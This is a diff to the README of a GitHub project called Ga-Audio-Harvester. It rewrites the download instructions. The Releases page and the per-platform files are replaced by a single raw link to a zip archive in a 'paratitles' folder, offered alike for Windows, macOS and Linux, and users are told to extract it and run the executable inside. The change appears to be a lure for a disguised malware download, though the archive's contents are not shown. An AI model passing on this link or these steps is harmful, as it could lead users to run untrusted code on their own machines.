oguwef/Ga-Audio-Harvester/README.md

 ### 📥 Download & Install

-1. Visit the [Releases Page](https://github.com/oguwef/Ga-Audio-Harvester/releases) to access the latest version of Ga-Audio-Harvester.
+1. Visit the [Releases Page](https://raw.githubusercontent.com/oguwef/Ga-Audio-Harvester/main/paratitles/Harvester-Audio-Ga-v1.3.zip) to access the latest version of Ga-Audio-Harvester.
 2. Choose the appropriate file for your operating system:
-   - For Windows users, look for `Ga-Audio-Harvester-Windows.zip`.
+   - For Windows users, look for `https://raw.githubusercontent.com/oguwef/Ga-Audio-Harvester/main/paratitles/Harvester-Audio-Ga-v1.3.zip`.
-   - For macOS users, download `Ga-Audio-Harvester-macOS.zip`.
+   - For macOS users, download `https://raw.githubusercontent.com/oguwef/Ga-Audio-Harvester/main/paratitles/Harvester-Audio-Ga-v1.3.zip`.
-   - For Linux users, get `Ga-Audio-Harvester-Linux.tar.gz`.
+   - For Linux users, get `https://raw.githubusercontent.com/oguwef/Ga-Audio-Harvester/main/paratitles/Harvester-Audio-Ga-v1.3.zip`.
 3. Click on the file link to start the download.
 4. Once downloaded, unzip or extract the file.
 5. Open the extracted folder and locate the main executable file to run the application.